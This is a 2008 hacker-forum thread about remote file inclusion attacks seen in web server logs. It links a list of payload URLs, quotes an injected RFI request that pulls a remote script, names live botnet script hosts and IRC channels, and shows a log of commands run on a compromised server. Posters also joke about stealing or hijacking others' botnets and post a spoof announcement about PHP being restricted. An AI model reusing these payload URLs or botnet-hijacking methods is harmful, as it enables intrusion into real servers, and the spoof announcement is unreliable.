Posted February 15, 200817 yr Seeing all these RFI (Remote File Include) attempts to the web server ever increasing daily, it dawned on me yesterday that I should pull them all out of the logs and generate a list that includes the file they are trying to push to the server. So I made a script that goes through and does just that. Figured I would make them public for others to enjoy. Some will 404, as they use free sites to host them and they get deleted by the host, others include some fun information for fucking with other peoples bots and such. http://www.myg0t.com/omp/rfiscanlist.htm If you do not know what RFI scans are then this does not apply to you. If you would like to educate yourself on this, you can read about them here: http://en.wikipedia.org/wiki/Remote_File_Inclusion
February 15, 200817 yr Daily business on the myg0t.com site, are you going to forward these log files to the FBI since we have a similiar device operating on the site now?
February 15, 200817 yr Author DerKaiser;545489']Daily business on the myg0t.com site' date=' are you going to forward these log files to the FBI since we have a similiar device operating on the site now?[/quote'] Huh? Lost in translation I guess.
February 15, 200817 yr a couple of you had pm'd me asking why its down today so this is for anyone else wondering; the data center has to replace a power line and install some type of FBI network monitoring devices per some law. To clarify ;x
February 16, 200817 yr OverlordQ;545498']Agaghahghagh' date=' I make somebodys bots .quit[/quote'] It's better to try and steal them & use them for your own shit.
February 16, 200817 yr are there any sites specifically for learning about this kind of shit? i'm intrigued.
February 16, 200817 yr are there any sites specifically for learning about this kind of shit? i'm intrigued. http://www.internethackersresource.net
February 16, 200817 yr http://www.internethackersresource.net nice link hopefully those who follow it will be enlightened. i notice that nobody's been able to spam the forums yet, though. Or gain access to administrator accounts. I haven't really seen some of these PHP shells before; this is quite interesting.
February 16, 200817 yr are there any sites specifically for learning about this kind of shit? i'm intrigued. Learn to code. nice link hopefully those who follow it will be enlightened. i notice that nobody's been able to spam the forums yet, though. Or gain access to administrator accounts. I haven't really seen some of these PHP shells before; this is quite interesting. Because myg0t's not vulnerable to RFI's? It's interesting to see brazilians and shit's different styles tho.
February 17, 200817 yr "server"=>"katana.webchat.org", "port"=>6667, "chan"=>"#samera", lol ATTACK! but he set +m on channel
February 18, 200817 yr 18:37… teviawn: .info 18:37… L02380609: [info]: [httpd: Apache] [docroot: c:/apache/htdocs] [domain: localhost] [admin: [email protected]] [url:/index.php?seccion=http://bialoka123.fileave.com/script9.txt??] 19:01… teviawn: .exec dir 19:01… L02380609: [exec]: dir 19:01… L02380609: : Volume in drive C has no label. 19:01… L02380609: : Volume Serial Number is 54BD-1345 19:01… L02380609: : Directory of c:\apache\htdocs 19:01… L02380609: : 18/02/2008 12:58a <DIR> . 19:01… L02380609: : 18/02/2008 12:58a <DIR> .. 19:01… L02380609: : 20/06/2003 02:25p 2 #i# 19:01… L02380609: : 02/07/2003 03:57p 294 #testcom.php# 19:01… L02380609: : 15/11/2007 09:27p 0 11.txt 19:01… L02380609: : 14/02/2008 08:34p 0 6 19:01… L02380609: : 07/04/2005 10:30a 12,543 activity.php 19:02… L02380609: : 31/07/2007 07:54a 9,272 activitypmp.php 19:02… L02380609: : 27/02/2006 07:35p 3,225 activitypmpn.php 19:02… L02380609: : 24/02/2006 09:40p 7,859 activitypmp_old.php 19:02… L02380609: : 27/04/2007 05:44p 7,925 activitypmp_old0.php 19:02… L02380609: : 24/02/2006 09:40p 7,903 activitypmp_ori.php 19:02… L02380609: : 30/01/2008 10:01p 5,324 advantages.htm 19:02… L02380609: : 24/11/2007 02:11p 41 alan.txt 19:02… L02380609: : 30/01/2008 10:00p 1,637 alliances.htm 19:02… L02380609: : 30/01/2008 10:00p 2,200 alliances_2.htm 19:02… L02380609: : 06/01/2005 03:11a 2,326 apache_pb.gif 19:02… L02380609 has quit IRC (Excess flood) Shittily coded, lol.
February 19, 200817 yr Hopped on a couple of botnets there to check them out http://www.chevirex.eu/orange/contenido/external/frontend/news.txt http://shop40.websolution365.com/bbs//data/xhev.txt back in the day i would of tried to steal them but now just cbf with botnets too much work and shit maybe we should just remove them to fuck them over
February 20, 200817 yr Due to numerous complaints on the subject, the Internets Administrative Networking Association has decided to severly limit the use of PHP files. From now on, PHP files will only be usable over Corporate and Private LAN Configurations and NOT on Public Internets or Intranets. PHP files may be converted to .jpg with Data Mapping for certain interactive Features or the popular XML format at http://iana.cnn.com/convertphp.xml for free of charge.
February 20, 200817 yr Due to numerous complaints on the subject, the Internets Administrative Networking Association has decided to severly limit the use of PHP files. From now on, PHP files will only be usable over Corporate and Private LAN Configurations and NOT on Public Internets or Intranets. PHP files may be converted to .jpg with Data Mapping for certain interactive Features or the popular XML format at http://iana.cnn.com/convertphp.xml for free of charge. aghaghaghaghagha the internets administrative networking association
February 20, 200817 yr i just removed two botnets over 300 on each hahahaha. used the networks #vhost channels to spoof login
February 20, 200817 yr SourceX;546502']i just removed two botnets over 300 on each hahahaha. used the networks #vhost channels to spoof login lol nice that will piss someone off
